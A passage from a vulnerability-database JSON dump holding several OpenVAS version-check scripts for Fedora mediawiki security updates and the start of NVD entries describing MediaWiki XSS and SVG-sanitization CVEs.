script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-17264\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17264\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147179.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:1361412562310868400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868400", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-12262", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-12262\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868400\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:02:20 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-12262\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12262\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140819.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.5~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-04-19T00:00:00", "id": "OPENVAS:1361412562310869260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869260", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2015-5569", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2015-5569\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869260\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-19 06:55:37 +0200 (Sun, 19 Apr 2015)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mediawiki FEDORA-2015-5569\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-5569\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154734.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-07T00:00:00", "id": "OPENVAS:1361412562310867951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867951", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-7805", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-7805\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867951\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-07 12:36:02 +0530 (Mon, 07 Jul 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-7805\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7805\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135086.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.11~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-06-17T00:00:00", "id": "OPENVAS:1361412562310867892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867892", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-6961", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-6961\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867892\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-17 10:01:26 +0530 (Tue, 17 Jun 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-6961\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-6961\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134116.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.10~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "description": "The remote host is missing an update for the ", "modified": "2020-02-04T00:00:00", "published": "2014-05-12T00:00:00", "id": "OPENVAS:1361412562310867776", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867776", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5691", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5691\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867776\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:10:21 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5691\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5691\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132602.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "description": "The remote host is missing an update for the ", "modified": "2020-02-04T00:00:00", "published": "2014-05-12T00:00:00", "id": "OPENVAS:1361412562310867788", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867788", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5684", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5684\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867788\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:11:11 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5684\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5684\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132655.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T19:58:27", "description": "The (1) Special:Preferences and (2) Special:UserLogin pages in MediaWiki before 1.19.20, 1.22.x before 1.22.12 and 1.23.x before 1.23.5 allows remote authenticated users to conduct cross-site scripting (XSS) attacks or have unspecified other impact via crafted CSS, as demonstrated by modifying MediaWiki:Common.css.", "edition": 5, "cvss3": {}, "published": "2014-10-07T14:55:00", "title": "CVE-2014-7295", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7295"], "modified": "2015-08-06T16:28:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.23.3", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.23.4", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.23.1", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.23.2", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.19.17", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.23.0", "cpe:/a:mediawiki:mediawiki:1.22.6", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.19", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.22.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19.18", "cpe:/a:mediawiki:mediawiki:1.22.11", "cpe:/a:mediawiki:mediawiki:1.22.10", "cpe:/a:mediawiki:mediawiki:1.19.16", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.22.8", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.19.15", "cpe:/a:mediawiki:mediawiki:1.22.9", "cpe:/a:mediawiki:mediawiki:1.19.14"], "id": "CVE-2014-7295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7295", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.16:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.17:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.18:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.11:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 does not properly sanitize SVG files, which allows remote attackers to have unspecified impact via invalid XML.", "edition": 5, "cvss3": {}, "published": 